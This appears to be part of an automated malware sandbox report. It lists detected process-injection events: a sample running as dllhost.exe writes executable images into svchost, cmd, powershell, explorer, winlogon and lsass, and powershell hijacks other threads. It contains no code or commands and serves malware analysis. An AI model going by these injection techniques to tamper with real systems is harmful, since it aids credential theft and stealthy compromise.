Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C06C9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CA6EDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A6F2BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EC29790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25235280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21EC07B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C06C9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2527DEB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CA6EDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A6F2BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 286D7CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EC29790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 257A8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25235280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1908C4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1D547800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21EC07B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 286D7CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 257A8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1908C4D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1D547800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 19192FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 19193100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 29BC05B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1FAFFD50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2271B950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22735E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1DAF18C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1DAF1910000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2127EAE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 176E8750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28CD8B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28CF3050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2612B210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2612B210000 value starts with: 4D5A
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 4056 base: 8B20000 value: 4D
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 6720 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 4332
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 1796
Sets debug register (to hijack the execution of another thread)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: 6720 1 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: D10000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: C33C0BB010
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22F4B920000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 262F1CA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 262F1CD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19FF1630000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A76A1A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2129B2D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 263841B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22125D90000
